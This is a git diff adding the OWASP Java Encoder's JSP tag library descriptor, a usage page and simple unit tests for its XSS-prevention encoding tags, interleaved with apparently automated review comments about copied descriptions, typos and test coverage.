org.owasp.encoder.tag.ForUriTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.tag.ForCssUrlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. + (X)HTML comments may be interpreted by browsers as something + other than a comment, typically in vendor specific extensions + (e.g. &lt;--if[IE]--&gt;. + For (X)HTML it is recommend that unsafe content never be included + in a comment. 
+ + forXmlComment + forXmlComment + org.owasp.encoder.tag.ForXmlCommentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for HTML text attributes. + forHtmlAttribute + forHtmlAttribute + org.owasp.encoder.tag.ForHtmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.tag.ForHtmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.tag.ForXmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.tag.ForUriComponentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.tag.ForCssStringTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.Encode + java.lang.String forHtml(java.lang.String) + forHtml(unsafeData) + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. 
Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.Encode + java.lang.String forHtmlContent(java.lang.String) + forHtmlContent(unsafeData) + + + Encodes for HTML text attributes. + forHtmlAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlAttribute(java.lang.String) + forHtmlAttribute(unsafeData) + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlUnquotedAttribute(java.lang.String) + forHtmlUnquotedAttribute(unsafeData) + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.Encode + java.lang.String forCssString(java.lang.String) + forCssString(unsafeData) + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.Encode + java.lang.String forCssUrl(java.lang.String) + forCssUrl(unsafeData) + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. 
+ + forUri + forUri + org.owasp.encoder.Encode + java.lang.String forUri(java.lang.String) + forUri(unsafeData) + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.Encode + java.lang.String forUriComponent(java.lang.String) + forUriComponent(unsafeData) + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.Encode + java.lang.String forXml(java.lang.String) + forXml(unsafeData) + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.Encode + java.lang.String forXmlContent(java.lang.String) + forXmlContent(unsafeData) + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.Encode + java.lang.String forXmlAttribute(java.lang.String) + forXmlAttribute(unsafeData) + + + + Encoder for XML comments. NOT FOR USE WITH (X)HTML CONTEXTS. + (X)HTML comments may be interpreted by browsers as something + other than a comment, typically in vendor specific extensions + (e.g. &lt;--if[IE]--&gt;. + For (X)HTML it is recommend that unsafe content never be included + in a comment. + + forXmlComment + org.owasp.encoder.Encode + java.lang.String forXmlComment(java.lang.String) + forXmlComment(unsafeData) + + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. 
+ + forCDATA + forCDATA + org.owasp.encoder.Encode + java.lang.String forCDATA(java.lang.String) + forCDATA(unsafeData) + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. + + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.Encode + java.lang.String forJavaScript(java.lang.String) + forJavaScript(unsafeData) + + + + This method encodes for JavaScript strings contained within + HTML script attributes (such as onclick). It is + NOT safe for use in script blocks. The caller MUST provide the + surrounding quotation characters. This method performs the + same encode as Encode.forJavaScript(String) with the + exception that / is not escaped. + + forJavaScriptAttribute + forJavaScriptAttribute + org.owasp.encoder.Encode + java.lang.String forJavaScriptAttribute(java.lang.String) + forJavaScriptAttribute(unsafeData) + + + + This method encodes for JavaScript strings contained within + HTML script blocks. It is NOT safe for use in script + attributes (such as onclick). The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String)} with + the exception that " and ' are encoded as \" and \' respectively. 
+ + forJavaScriptBlock + forJavaScriptBlock + org.owasp.encoder.Encode + java.lang.String forJavaScriptBlock(java.lang.String) + forJavaScriptBlock(unsafeData) + + + + This method encodes for JavaScript strings contained within + a JavaScript or JSON file. This method is NOT safe for + use in ANY context embedded in HTML. The caller must + provide the surrounding quotation characters. This method + performs the same encode as Encode.forJavaScript(String) with + the exception that / and & are not escaped and " and ' are + encoded as \" and \' respectively. + + forJavaScriptSource + forJavaScriptSource + org.owasp.encoder.Encode + java.lang.String forJavaScriptSource(java.lang.String) + + <%@page contentType="text/javascript; charset=UTF-8"%> + var data = '${forJavaScriptSource(unsafeData)}'; + + + \ No newline at end of file diff --git a/jsp/src/main/resources/META-INF/java-encoder.tld b/jsp/src/main/resources/META-INF/java-encoder.tld new file mode 100644 index 0000000..b761de0 --- /dev/null +++ b/jsp/src/main/resources/META-INF/java-encoder.tld 
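Review bot: The forXmlContent description, in both its tag entry and its EL-function entry, is a copy of the forHtmlContent text: it says "Encodes for HTML text content ... Use either forHtml or forHtmlAttribute", which sends users of the XML encoder to the wrong sibling functions. Suggested wording: `Encodes for XML text content. It does not escape quotation characters and is thus unsafe for use in XML attributes; use forXml or forXmlAttribute for those.` The same copied sentence appears in java-encoder.tld, so fix both. Smaller wording issues in the same descriptions: "insure" should be "ensure", "targetted" "targeted", "less efficient then" "than", "it is recommend" "it is recommended", and the forXmlComment example `&lt;--if[IE]--&gt;` is missing its closing parenthesis and does not match the conditional-comment form `<!--[if IE]>` it seems to refer to. Element markup is stripped in this view, so I cannot confirm which element each sentence sits in.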
@@ -0,0 +1,403 @@ + + + OWASP Java Encoder Project + 1.0 + java-encoder + https://www.owasp.org/index.php/OWASP_Java_Encoder_Project + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.tag.ForCDATATag + empty + + The value to be written out + value + true + true + java.lang.String + + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.tag.ForHtmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.tag.ForXmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.tag.ForXmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + Since this performs additional encoding so it can work in all + of the JavaScript contexts listed, it may be slightly less + efficient then using one of the methods targetted to a specific + JavaScript context: forJavaScriptAttribute, + forJavaScriptBlock, or forJavaScriptSource. 
+ + Unless you are interested in saving a few bytes of output or + are writing a framework on top of this library, it is recommend + that you use this method over the others. + + forJavaScript + forJavaScript + org.owasp.encoder.tag.ForJavaScriptTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.tag.ForHtmlUnquotedAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.tag.ForUriTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.tag.ForCssUrlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + Encodes for HTML text attributes. 
+ forHtmlAttribute + forHtmlAttribute + org.owasp.encoder.tag.ForHtmlAttributeTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.tag.ForHtmlTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.tag.ForXmlContentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.tag.ForUriComponentTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.tag.ForCssStringTag + empty + + value to be written out + value + true + true + java.lang.String + + + + + Encodes for (X)HTML text content and text attributes. + + forHtml + forHtml + org.owasp.encoder.Encode + java.lang.String forHtml(java.lang.String) + forHtml(unsafeData) + + + + This method encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forHtmlContent + forHtmlContent + org.owasp.encoder.Encode + java.lang.String forHtmlContent(java.lang.String) + forHtmlContent(unsafeData) + + + Encodes for HTML text attributes. 
+ forHtmlAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlAttribute(java.lang.String) + forHtmlAttribute(unsafeData) + + + + Encodes for unquoted HTML attribute values. forHtml(String) or + forHtmlAttribute(String) should usually be preferred over this + method as quoted attributes are XHTML compliant. + + forHtmlUnquotedAttribute + forHtmlUnquotedAttribute + org.owasp.encoder.Encode + java.lang.String forHtmlUnquotedAttribute(java.lang.String) + forHtmlUnquotedAttribute(unsafeData) + + + + Encodes for CSS strings. The context must be surrounded by quotation characters. + It is safe for use in both style blocks and attributes in HTML. + + forCssString + forCssString + org.owasp.encoder.Encode + java.lang.String forCssString(java.lang.String) + forCssString(unsafeData) + + + + Encodes for CSS URL contexts. The context must be surrounded by "url()". It + is safe for use in both style blocks and attributes in HTML. Note: this does + not do any checking on the quality or safety of the URL itself. The caller + should insure that the URL is safe for embedding (e.g. input validation) by + other means. + + forCssUrl + forCssUrl + org.owasp.encoder.Encode + java.lang.String forCssUrl(java.lang.String) + forCssUrl(unsafeData) + + + + Performs percent-encoding of a URL according to RFC 3986. The provided + URL is assumed to a valid URL. This method does not do any checking on + the quality or safety of the URL itself. In many applications it may + be better to use java.net.URI instead. Note: this is a + particularly dangerous context to put untrusted content in, as for + example a "javascript:" URL provided by a malicious user would be + "properly" escaped, and still execute. + + forUri + forUri + org.owasp.encoder.Encode + java.lang.String forUri(java.lang.String) + forUri(unsafeData) + + + + Performs percent-encoding for a component of a URI, such as a query + parameter name or value, path or query-string. 
In particular this + method insures that special characters in the component do not get + interpreted as part of another component. + + forUriComponent + forUriComponent + org.owasp.encoder.Encode + java.lang.String forUriComponent(java.lang.String) + forUriComponent(unsafeData) + + + Encodes for XML and XHTML. + forXml + forXml + org.owasp.encoder.Encode + java.lang.String forXml(java.lang.String) + forXml(unsafeData) + + + + Encodes for HTML text content. It does not escape + quotation characters and is thus unsafe for use with + HTML attributes. Use either forHtml or forHtmlAttribute for those + methods. + + forXmlContent + forXmlContent + org.owasp.encoder.Encode + java.lang.String forXmlContent(java.lang.String) + forXmlContent(unsafeData) + + + Encodes for XML and XHTML attribute content. + forXmlAttribute + forXmlAttribute + org.owasp.encoder.Encode + java.lang.String forXmlAttribute(java.lang.String) + forXmlAttribute(unsafeData) + + + + Encodes data for an XML CDATA section. On the chance that the input + contains a terminating + "]]&gt;", it will be replaced by + &quot;]]&gt;]]&lt;![CDATA[&gt;&quot;. + As with all XML contexts, characters that are invalid according to the + XML specification will be replaced by a space character. Caller must + provide the CDATA section boundaries. + + forCDATA + forCDATA + org.owasp.encoder.Encode + java.lang.String forCDATA(java.lang.String) + forCDATA(unsafeData) + + + + Encodes for a JavaScript string. It is safe for use in HTML + script attributes (such as onclick), script + blocks, JSON files, and JavaScript source. The caller MUST + provide the surrounding quotation characters for the string. + + forJavaScript + forJavaScript + org.owasp.encoder.Encode + java.lang.String forJavaScript(java.lang.String) + forJavaScript(unsafeData) + + \ No newline at end of file diff --git a/jsp/src/site/markdown/index.md b/jsp/src/site/markdown/index.md new file mode 100644 index 0000000..e2c305a --- /dev/null 
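Review bot: forXmlContent's description (tag entry and function entry) describes HTML and refers readers to forHtml/forHtmlAttribute although the function encodes XML text content; the XML counterparts are forXml and forXmlAttribute, so the text should read `unsafe for use in XML attributes; use forXml or forXmlAttribute for those`. Separately, the forHtmlAttribute EL-function entry shows its name only once where every other function entry shows it twice (presumably display-name plus name); if it is only the optional display-name that is missing this is harmless, but element markup is stripped in this view, so verify the entry is complete rather than assume it. The forUri text already carries the "javascript: URL would be properly escaped and still execute" warning, which is the right caveat to keep prominent for a tag users will reach for first.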
+++ b/jsp/src/site/markdown/index.md @@ -0,0 +1,31 @@ +## OWASP JSP + +The OWASP JSP Encoder is a collection of high-performance low-overhead +contextual encoders that, when utilized correctly, is an effective tool in +preventing Web Application security vulnerabilities such as Cross-Site +Scripting (XSS). + +Please see the [OWASP XSS Prevention Cheat Sheet](https://www.owasp.org/index.php/XSS_%28Cross_Site_Scripting%29_Prevention_Cheat_Sheet) +for more information on preventing XSS. + +### JSP Usage + +The JSP Encoder makes the use of the Java Encoder within JSP simple via a TLD that +includes tags and a set of JSP EL functions: + +```xml + + org.owasp.encoder + encoder-jsp + 1.2.3 + +``` + +```JSP +<%@taglib prefix="e" uri="https://www.owasp.org/index.php/OWASP_Java_Encoder_Project" %> + +<%-- ... --%> + +

    Dynamic data via EL: ${e:forHtml(param.value)}

    +

    Dynamic data via tag:

    +``` diff --git a/jsp/src/site/site.xml b/jsp/src/site/site.xml new file mode 100644 index 0000000..dde2b60 --- /dev/null +++ b/jsp/src/site/site.xml @@ -0,0 +1,41 @@ + + + + + + \ No newline at end of file diff --git a/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java new file mode 100644 index 0000000..4f49e8b --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/EncodingTagTest.java 
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+package org.owasp.encoder.tag;
+
+import junit.framework.TestCase;
+import org.springframework.mock.web.MockHttpServletRequest;
+import org.springframework.mock.web.MockHttpServletResponse;
+import org.springframework.mock.web.MockPageContext;
+import org.springframework.mock.web.MockServletContext;
+
+/**
+ * EncodingTagTest is the base class for all unit tests for the tags.
+ * This sets up the ServletContext so that tags can be tested.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public abstract class EncodingTagTest extends TestCase {
+
+ protected MockServletContext _servletContext;
+ protected MockPageContext _pageContext;
+ protected MockHttpServletRequest _request;
+ protected MockHttpServletResponse _response;
+
+ /**
+ * Constructor for the EncodingTagTest
+ * @param testName the name of the test
+ */
+ public EncodingTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ _servletContext = new MockServletContext();
+ _request = new MockHttpServletRequest();
+ _response = new MockHttpServletResponse();
+ _pageContext = new MockPageContext(_servletContext, _request, _response);
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java
new file mode 100644
index 0000000..c8e3847
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCDATATagTest.java
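Review bot: The four protected fields carry no documentation, and the one relationship subclasses depend on is not visible from their declarations: `_pageContext` is constructed over `_response`, and the subclass tests read the tag's output back with `_response.getContentAsString()` after `doTag()`. I would put on `_pageContext` the comment `// Wired to _response: output a tag writes through getJspContext().getOut() is read back from _response in subclass tests.` and a one-line Javadoc on the class saying that setUp() rebuilds all four mocks before every test, so no state leaks between test methods. The `tearDown` override only delegates to super; either drop it or give it a one-line comment stating it is kept as a hook for subclasses.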
@@ -0,0 +1,77 @@ +// Copyright (c) 2012 Jeff Ichnowski +// All rights reserved. +// +// Redistribution and use in source and binary forms, with or without +// modification, are permitted provided that the following conditions +// are met: +// +// * Redistributions of source code must retain the above +// copyright notice, this list of conditions and the following +// disclaimer. +// +// * Redistributions in binary form must reproduce the above +// copyright notice, this list of conditions and the following +// disclaimer in the documentation and/or other materials +// provided with the distribution. +// +// * Neither the name of the OWASP nor the names of its +// contributors may be used to endorse or promote products +// derived from this software without specific prior written +// permission. +// +// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS +// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT +// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS +// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE +// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, +// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES +// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR +// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) +// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, +// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) +// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED +// OF THE POSSIBILITY OF SUCH DAMAGE. + + +package org.owasp.encoder.tag; + +/** + * Simple tests for the ForCDATATag. 
+ * + * @author Jeremy Long (jeremy.long@gmail.com) + */ +public class ForCDATATagTest extends EncodingTagTest { + + public ForCDATATagTest(String testName) { + super(testName); + } + + @Override + protected void setUp() throws Exception { + super.setUp(); + } + + @Override + protected void tearDown() throws Exception { + super.tearDown(); + } + + /** + * Test of doTag method, of class ForCDATATag. + * This is a very simple test that doesn't fully + * exercise/test the encoder - only that the + * tag itself works. + * @throws Exception is thrown if the tag fails. + */ + public void testDoTag() throws Exception { + System.out.println("doTag"); + ForCDATATag instance = new ForCDATATag(); + String value = "
    ]]>
    "; + String expected = "
    ]]]]>
    "; + instance.setJspContext(_pageContext); + instance.setValue(value); + instance.doTag(); + String results = _response.getContentAsString(); + assertEquals(expected,results); + } +} diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java new file mode 100644 index 0000000..0c9d6e8 --- /dev/null +++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCssStringTagTest.java 
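Review bot: `System.out.println("doTag");` as the first statement of testDoTag is noise in a unit test whose assertion already reports the outcome; drop it (the same line is in ForCssStringTagTest). The single input exercises only the `]]>` split, and the string literals appear with their markup stripped in this view, so I cannot confirm the exact value/expected pair. Since the TLD description promises that characters invalid per the XML specification are replaced by a space, a second assertion at the tag level, e.g. value `"a\u0001b"` expected `"a b"`, would pin that promise through the JSP path, but confirm against the core forCDATA tests before adding it, as I have not verified the encoder's handling here. A null `value` is also untested; the TLD marks the attribute required, so a test that documents what `doTag()` does with null (or an explicit guard in the tag) would be worth having.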
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForCssStringTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForCssStringTagTest extends EncodingTagTest {
+
+ public ForCssStringTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForCssStringTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForCssStringTag instance = new ForCssStringTag();
+ String value = "
    ";
+ String expected = "\\3c div\\3e";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected,results);
+ }
+}
diff --git a/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java b/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java
new file mode 100644
index 0000000..77936c3
--- /dev/null
+++ b/jsp/src/test/java/org/owasp/encoder/tag/ForCssUrlTagTest.java
@@ -0,0 +1,77 @@
+// Copyright (c) 2012 Jeff Ichnowski
+// All rights reserved.
+//
+// Redistribution and use in source and binary forms, with or without
+// modification, are permitted provided that the following conditions
+// are met:
+//
+// * Redistributions of source code must retain the above
+// copyright notice, this list of conditions and the following
+// disclaimer.
+//
+// * Redistributions in binary form must reproduce the above
+// copyright notice, this list of conditions and the following
+// disclaimer in the documentation and/or other materials
+// provided with the distribution.
+//
+// * Neither the name of the OWASP nor the names of its
+// contributors may be used to endorse or promote products
+// derived from this software without specific prior written
+// permission.
+//
+// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
+// "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
+// LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
+// FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
+// COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT,
+// INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+// (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
+// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+// HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+// STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+// ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+// OF THE POSSIBILITY OF SUCH DAMAGE.
+
+
+package org.owasp.encoder.tag;
+
+/**
+ * Simple tests for the ForCssUrlTag.
+ *
+ * @author Jeremy Long (jeremy.long@gmail.com)
+ */
+public class ForCssUrlTagTest extends EncodingTagTest {
+
+ public ForCssUrlTagTest(String testName) {
+ super(testName);
+ }
+
+ @Override
+ protected void setUp() throws Exception {
+ super.setUp();
+ }
+
+ @Override
+ protected void tearDown() throws Exception {
+ super.tearDown();
+ }
+
+ /**
+ * Test of doTag method, of class ForCssUrlTag.
+ * This is a very simple test that doesn't fully
+ * exercise/test the encoder - only that the
+ * tag itself works.
+ * @throws Exception is thrown if the tag fails.
+ */
+ public void testDoTag() throws Exception {
+ System.out.println("doTag");
+ ForCssUrlTag instance = new ForCssUrlTag();
+ String value = "\\';";
+ String expected = "\\5c\\27;";
+ instance.setJspContext(_pageContext);
+ instance.setValue(value);
+ instance.doTag();
+ String results = _response.getContentAsString();
+ assertEquals(expected, results);
+ }
+}
